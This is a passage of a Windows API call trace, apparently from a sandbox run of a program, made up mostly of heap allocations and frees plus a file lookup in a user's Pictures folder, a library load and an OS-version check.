(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0209.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.810] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/EHKlEyoM3xoIg8ms.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c202c50, ftCreationTime.dwHighDateTime=0x1d5c8a6, ftLastAccessTime.dwLowDateTime=0xf9e92410, ftLastAccessTime.dwHighDateTime=0x1d5c85c, ftLastWriteTime.dwLowDateTime=0xf9e92410, ftLastWriteTime.dwHighDateTime=0x1d5c85c, nFileSizeHigh=0x0, nFileSizeLow=0xeb64, dwReserved0=0x0, dwReserved1=0x0, cFileName="EHKlEyoM3xoIg8ms.jpg", cAlternateFileName="EHKLEY~1.JPG")) returned 0x9e2238 [0209.810] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0209.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.812] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.812] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0209.812] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.812] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0209.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.813] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.814] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.814] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.815] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.815] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.815] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 